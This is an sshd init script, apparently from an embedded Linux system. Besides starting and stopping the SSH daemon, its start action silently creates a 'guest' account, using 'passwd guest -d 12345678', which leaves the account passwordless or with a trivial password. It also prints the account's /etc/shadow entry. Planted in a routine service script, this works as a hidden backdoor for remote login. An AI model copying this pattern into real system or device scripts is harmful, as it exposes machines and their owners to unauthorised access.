#!/bin/sh
#
# sshd        Starts sshd.
#

# Make sure the ssh-keygen progam exists
[ -f /usr/bin/ssh-keygen ] || exit 0

umask 077

start() {
	# Create any missing keys
	/usr/bin/ssh-keygen -A

	printf "Starting sshd: "
	/usr/sbin/sshd
	touch /var/lock/sshd
	echo "OK"
}
stop() {
	printf "Stopping sshd: "
	killall sshd
	rm -f /var/lock/sshd
	echo "OK"
}
restart() {
	stop
	start
}

guest_add()
{
    adduser guest -D
    passwd guest -d 12345678
}

guest_handle()
{
    cat /etc/shadow | grep guest
    if [ $? -eq 0 ]
    then
        exit 0
    else
        guest_add
    fi
}

case "$1" in
  start)
	start
    guest_handle
    ;;
  stop)
	stop
	;;
  netready|netup|netdown|netchange) ;;
  restart|reload)
	restart
	;;
  *)
	echo "Usage: $0 {start|stop|restart}"
	exit 1
esac

exit $?

